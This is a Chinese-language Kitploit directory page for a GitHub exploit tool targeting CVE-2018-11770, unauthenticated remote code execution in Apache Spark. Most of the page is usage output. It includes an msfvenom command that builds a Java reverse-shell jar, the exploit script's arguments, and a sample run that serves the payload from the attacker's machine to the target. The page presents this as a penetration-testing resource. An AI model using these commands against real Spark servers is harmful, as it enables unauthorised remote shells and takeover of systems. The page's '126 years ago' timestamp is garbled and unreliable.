Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-11770 — 基于 Metasploit 模块重写的 Apache Spark Python RCE 利用工具 | Kitploit
工具/GitHubGitHub/ivanitlearning/cve-2018-11770
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubivanitlearning/cve-2018-11770

CVE-2018-11770

基于 Metasploit 模块重写的 Apache Spark Python RCE 利用工具

查看仓库
126年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-11770 Apache Spark 未授权反向 Shell RCE

基于 该 Metasploit 模块 重写的独立 Python 3 RCE 漏洞利用程序

漏洞利用 POC 在此说明。利用代码本身 在此解释。

在 Python 3.7 环境下 对该目标 进行了测试。

使用方法:

root@kitploit:~
root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# msfvenom -p java/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f jar -o payload/exploit.jar
Payload size: 7550 bytes
Final size of jar file: 7550 bytes
Saved as: payload/exploit.jar

root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# ./CVE-2018-11770.py -h
usage: CVE-2018-11770.py [-h] [-httpdelay HTTPDELAY] -rhost RHOST
                         [-rport RPORT] -srvhost SRVHOST [-srvport SRVPORT]
                         [-uripath URIPATH] -payload PAYLOAD

按如下方式调用漏洞利用程序: 
./CVE-2018-11770.py -httpdelay 10 -rhost 192.168.92.153 -rport 6066 -srvhost 192.168.92.134 -srvport 8080 -uripath path -payload exploit.jar

必需参数:
  -rhost RHOST          运行 Apache Spark 的目标主机,例如 192.168.92.153
  -srvhost SRVHOST      本地监听地址。该地址必须是本地机器上 Apache Spark 可达的地址,例如 192.168.92.134
  -payload PAYLOAD      恶意 jar 文件的路径,例如 dir/exploit.jar

可选参数:
  -httpdelay HTTPDELAY   Web 服务器在终止前的等待秒数。默认值:10s
  -rport RPORT           运行 Apache Spark 的目标端口。默认值:6066
  -srvport SRVPORT       本地监听端口。默认值:8080
  -uripath URIPATH       本漏洞利用程序 Web 服务器提供服务的 URI 路径。默认值:path,例如 http://192.168.92.134/path

root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# ./CVE-2018-11770.py -rhost 192.168.92.153 -srvhost 192.168.92.134 -payload payload/exploit.jar 
启动 Web 服务器...
将 payload 发送到服务器...
下载工具